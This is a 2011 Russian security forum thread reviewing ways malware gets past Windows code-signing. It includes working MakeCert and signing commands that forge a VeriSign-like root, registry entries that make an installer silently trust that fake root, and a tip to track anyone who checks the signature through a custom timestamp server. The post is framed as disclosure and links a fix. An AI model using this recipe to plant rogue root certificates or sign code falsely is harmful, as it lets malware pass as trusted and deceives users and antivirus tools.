Цифровые подписи в исполняемых файлах и обход этой защиты во вредоносных программах

Тема в разделе "Новости информационной безопасности", создана пользователем gjf, 21 янв 2011.

  1. gjf
    Оффлайн

    gjf Ассоциация VN Разработчик

    Сообщения:
    639
    Симпатии:
    823
    Сегодня я предлагаю Вашему вниманию небольшой обзор по системе электронных подписей исполняемых файлов и способам обхода и фальсификации этой системы. Также будет рассмотрен в деталях один из весьма действенных способов обхода. Несмотря на то, что описываемой инфе уже несколько месяцев, знают о ней не все. Производители описываемых ниже продуктов были уведомлены об описываемом материале, так что решение этой проблемы, если они вообще считают это проблемой, на их ответственности. Потому как времени было предостаточно.

    ТЕОРИЯ


    Идея и технология электронной подписи для исполняемых файлов возникла ещё в эпоху Windows NT. C момента появления Windows Vista компания Microsoft начала активную компанию по продвижению этой технологии. По задумке производителя, подписанный код может идти только от доверенного автора этого кода, а следовательно гарантированно не наносит вреда системе и защищён от ошибок (три ха-ха).

    Тем не менее, поскольку в механизме подписи чаще всего используется довольно сложный криптоустойчивый механизм, общее доверие к подписанному коду распространилось. Не ушли от этого и антивирусные вендоры. Верно: если код подписан, то он явно не может быть вирусом, а потому ему можно доверять априори, тем самым снизив вероятность ложных срабатываний. Поэтому в большинстве современных антивирусных продуктов по умолчанию стоит обход проверки подписанных файлов, что повышает скорость сканирования и снижает вероятность ложных срабатываний. Более того, зачастую подписанные программы автоматически заносятся в категорию "доверенных" поведенческих анализаторов ака хипсов.

    Становится ясно, что подписав свои творения валидной подписью, вирусмейкер получает довольно богатую аудиторию клиентов, у которых даже с активным и регулярно обновляемым антивирусом произойдёт заражение. Очевидно, что это - весьма лакомый кусочек, что легко заметно на примере уже ставшего занменитым вируса Stuxnet, где код был подписан валидными сертификатами Realtek (позже сообщалось и о подписях от JMicron).

    Но у этого подхода есть и оборотная сторона: после выявления скомпрометированной подписи она немедленно отзывается, а по самому факту подписи АВ-вендоры ставят сигнатурный детект, понятно, что с 100%-ным срабатыванием. Учитывая то, что приобрести украденный сертификат, необходимый для подписывания крайне дорого, ясно, что вирусмейкеры заинтересованы в тотальном обходе механизма проверки подписи, без валидных private-ключей или с помощью самостоятельной генерации таких ключей. Это позволит обходить защиту не только антивирусных продуктов, но и устанавливать драйвера и ActiveX-компоненты без предупреждений, да и вообще как-то пробиться в мир х64, где без подписей ничего не установить вообще.

    Но об этом - подробнее на практике.

    ПРАКТИКА

    Кто-то из великих сказал, что чтобы опередить врага, надо начать мыслить как он. Итак, если мы вирусмейкеры, то что мы можем сделать?

    1. Скопировать информацию о сертификате с какого-нибудь чистого файла.

    Это наиболее популярный способ на данный момент. Копируется информация подписи до мельчайших подробностей, вплоть до цепочки доверенных издателей. Понятно, что такая копия валидна только на взгляд пользователя. Однако то, что отображает ОС вполне может сбить с толку неискушённого и быть воспринято как очередной глюк - ещё бы, если все издатели правильные, то почему это подпись невалидна? Увы и ах - таких большинство.

    2. Использовать самоподписанные сертификаты с фэйковым именем.

    Аналогично выше описанному варианту за исключением того, что даже не копируется цепочка в пути сертификации.

    3. Подделать MD5.

    Несмотря на то, что слабость алгоритма MD5 уже давно описана (тут и тут), он до сих пор часто используется в электронных подписях. Однако реальные примеры взлома MD5 касаются или очень маленьких файлов, или приводят к неправильной работе кода. На практике не встречаются вирусы с поддельными взломанными подписями на алгоритме MD5, но тем не менее такой способ возможен теоретически.

    4. Получить сертификат по обычной процедуре и использовать его в злонамеренных целях.

    Одна из наиболее распространённых методик авторов так называемых riskware, adware и фэйковых антивирусов. Примером может послужить фэйковый Perfect Defender (стандартный развод: "просканируйтесь бесплатно - у вас вирус - заплатите нам и мы его удалим") существует с подписями нескольких контор:
    • Jeansovi llc
    • Perfect Software llc
    • Sovinsky llc
    • Trambambon llc

    Как это делается хорошо могут рассказать наши отечественные разработчики винлокеров, мелкими буквами пишущие про "программу-шутку" и т.д., таким образом оберегаясь от статьи о мошенничестве. Так и живём...

    Интересно, что реально существуют абсолютно нормальные программы с такими именами владельцев:
    • Verified Software
    • Genuine Software Update Limited
    • Browser plugin

    Понятно, что если уж этому верить, то ошибиться при первом взгляде на сертификат несложно.

    Следует также отметить, что отнюдь несложно получить подпись от сертификационных центров. Например RapidSSL для проверки использует просто e-mail. Если переписка ведётся из адресов типа admin, administrator, hostmaster, info, is, it, mis, postmaster, root, ssladmin,
    ssladministrator, sslwebmaster, sysadmin или webmaster@somedomain.com - очевидно, что пишет владелец домена, верно? (ещё три ха-ха). А вот славная компания Digital River (DR), промышляющая аутсорсингом и электронной коммерцией, вообще предоставляет сертификаты всем своим клиентам. Немудрено, что MSNSpyMonitor, WinFixer, QuickKeyLogger, ErrorSafe, ESurveiller, SpyBuddy, TotalSpy, Spynomore, Spypal и вообще около 0,6% из всех подписанных DR файлов являются малварью, а потенциально нежелательными являются и того больше - более 5% всех подписанных DR файлов.

    Справедливости ради отмечу, что подписать х64-драйвер далеко не так просто, в этом случае пока нарушений не замечено.

    5. Найти какого-нибудь работника доверенной компании и попросить его подписать Ваш код.

    Без комментариев. Все любят деньги. Вопрос только в сумме :)

    6. Украсть сертификат.


    На данный момент известно три больших семейства троянцев, "заточенных", в частности, под похищение сертификатов. Это:
    • Adrenalin
    • Ursnif
    • Zeus
    • SpyEye (возможно)

    Тем не менее пока не замечено массовых случаев использования украденных сертификатов в новых версиях этих троянцев. Возможно, это козырь в рукаве? Время покажет...

    7. Заразить систему разработки доверенного разработчика и внедрять злонамеренный код в релизы до подписания.


    Яркий пример такого заражения - вирус-концепт Induc.a. Вирус внедряет код на этапе компиляции, заражая систему разработки. В итоге разработчик даже не знает, что в его программе появился невидимый "довесок". Релиз проходит подпись и выходит в свет с полноценным сертификатом. Видишь суслика? А он есть! ;)

    К счастью, Induc.a является только PoC, выполняя только заражение систем разработки без реализации какого бы то ни было дополнительного вредоносного функционала.

    Ну а теперь - обещанные вкусняшки.

    УЯЗВИМОСТЬ ИЛИ КАК Я ПРОВЁЛ ЭТИМ ЛЕТОМ

    Как видим, вариантов обхода подписи достаточно много. В нашем примере будет рассмотрен модифицированный вариант 1 и 2, описанные выше.

    Итак, что нам потребуется?
    - MakeCert.exe
    - cert2spc.exe
    - sign.exe
    - ruki.sys
    - mozg.dll

    Думаю, что для читателя не составит труда найти эти компоненты, но для самых ленивых выкладываю первые три здесь. Последние два не выкладываю в виду жёсткой привязки к железу, полному отсутствию кроссплатформенности и специфичности кода :)

    Итак, создадим какой-либо сертификат доверенного издателя. Попробуем максимально скопировать информацию о том же VeriSign:

    Код (Text):
    MakeCert.exe -# 7300940696719857889 -$ commercial -n CN="VeriSign Class 3 Code Signing 2009-2 CA" -a sha1 -sky signature -l "https://www.verisign.com/rpa" -cy authority -m 12 -h 2 -len 1024 -eku 1.3.6.1.5.5.7.3.2,1.3.6.1.5.5.7.3.3 -r -sv veri.pvk veri.cer
    В результате выполнения мы получим veri.pvk и veri.cer, пригодные для подписывания.

    Теперь создадим дочерний сертификат с использованием полученных только что:
    Код (Text):

    MakeCert.exe -# 8928659211875058207 -$ commercial -n CN="Home Sweet Home" -a sha1 -sky signature -l "http://habrahabr.ru/" -ic veri.cer -iv veri.pvk -cy end -m 12 -h 2 -len 1024 -eku 1.3.6.1.5.5.7.3.3 -sv kl.pvk kl.cer
    В итоге получим kl.pvk и kl.cer, которые будут доверенными сертификатами от недоверенного издателя. Цепочку можно продолжать долго, задуривая наивного пользователя. Но итог будет один: сертификат не будет валидным, потому как в цепочке есть один недоверенный элемент. НО!

    В Windows имеется возможность установки любого сертификата, в том числе и самоподписанного, в качестве доверенного. Это удобно: в ряде случаев разработчик может сделать себе самоподписанный сертификат, ввести его в доверенные и спокойно работать со своими приложениям. В нашем случае это удобно вдвойне, потому как такой внос - очевидно, простое внесение информации в реестр. при чём информации отнюдь не специфичной для конкретной системы.

    Установим на нашу тестовую виртуалку любой монитор реестра, после чего внесём наш искомый сертификат от якобы VeriSign в доверенные. Отследим, где произошло изменение - и voila! Мы можем сделать дамп соответствующей ветки реестра, после чего засунуть её в инсталлер. В итого, наш инсталлер вносит в реестр инфу, автоматически превращая сертификат первичного издателя в доверенный и валидируя всю цепочку.

    Чтобы окончательно не открывать все карты, скажу только, что в моём случае дамп реестра имел вид
    Код (Text):
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A61F9F1A51BBCA24218F9D14611AFBA61B86C14C]
    "Blob"=hex:04,00,00,.....
    ну или если только для текущего пользователя, то
    Код (Text):
    Windows Registry Editor Version 5.00

    [HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\A61F9F1A51BBCA24218F9D14611AFBA61B86C14C]
    "Blob"=hex:04,00,00,.....
    Внеся в реестр эти данные, программа с фэйковой цепочкой подписи автоматом проходила проверку по sigverif.exe. Ну а подписать наш код с помощью полученного сертификата вообще просто, достаточно батника:

    Код (Text):
    cert2spc.exe kl.cer kl.spc
    sign.exe -spc kl.spc -v kl.pvk -n "My Installer" -i "http://habrahabr.ru" -ky signature -$ commercial -a sha1 -t "http://timestamp.verisign.com/scripts/timstamp.dll" myprogram.exe
    del kl.spc
    Обратите внимание на использование таймстампа http://timestamp.verisign.com/scripts/timstamp.dll - теоретически вполне возможно использование собственного сервера на собственном домене, что позволит каждый раз видеть, что кто-то проверил подпись нашей программы на своём компьютере, а значит получать IP и время проверки. Правда удобно? ;)

    Самое забавное, что на момент написания материала в далёком октябре-ноябре 2010-го Kaspersky Internet Security 2011 не отслеживала указанные ветки реестра, а проверку валидности цепочки оставляла на усмотрение ОС, которую мы довольно просто надули. Не знаю, что сейчас, но вроде как некоторые ветки заблокировали... Проверяйте, отписывайтесь!

    Нужно отметить, что для простановки подписей возможно использование и специфичного, недоступного в паблике софта. Понятно, что подписи он не ломает, но даёт куда более гибкие возможности для заполнения полей X500, что ещё лучше создаёт видимость валидности. Вот тут возможно скачать любопытный пример. В архиве - файл популярной замены Блокноту bred3_2k (офсайт) с и без подписи Microsoft :) Чтобы подпись полностью стала валидной, достаточно внести в реестр изменения, содержащиеся в файле key +.reg. Аналогично, файл key -.reg эти изменения отменяет. Отследите путь сертификации - он любопытен :)

    Сразу обращаю внимание на то, что автор "примера" прописал собственный таймстамп-сервер, так что любые манипуляции приведут к тому, что автор узнает Ваш IP - и дальше, как описывалось. Если хотите, то можете отследить эти обращения и отписаться в комментах ;)

    Ранее я уже обсуждал эту уязвимость без уточнения деталей, здесь имеется рецепт по её устранению. Отписывайтесь в комментах - возможно, что эту уязвимость уже пофиксили.

    В статье использован материал презентации Jarno Niemela (F-Secure).
     
    Phoenix, Legion107, Kиpилл и 14 другим нравится это.
  2. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.441
    Симпатии:
    13.944
    Уже есть "мутант" ведь "хозяин" Zeus продал свое детище.
     
    Legion107 нравится это.
  3. gjf
    Оффлайн

    gjf Ассоциация VN Разработчик

    Сообщения:
    639
    Симпатии:
    823
    Насколько мне известно, "мутант" - это пока что "утка".
     
  4. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.441
    Симпатии:
    13.944
    Ну значит ждемс :) когда вымысел станет реальностью.
     
    Legion107 нравится это.

Поделиться этой страницей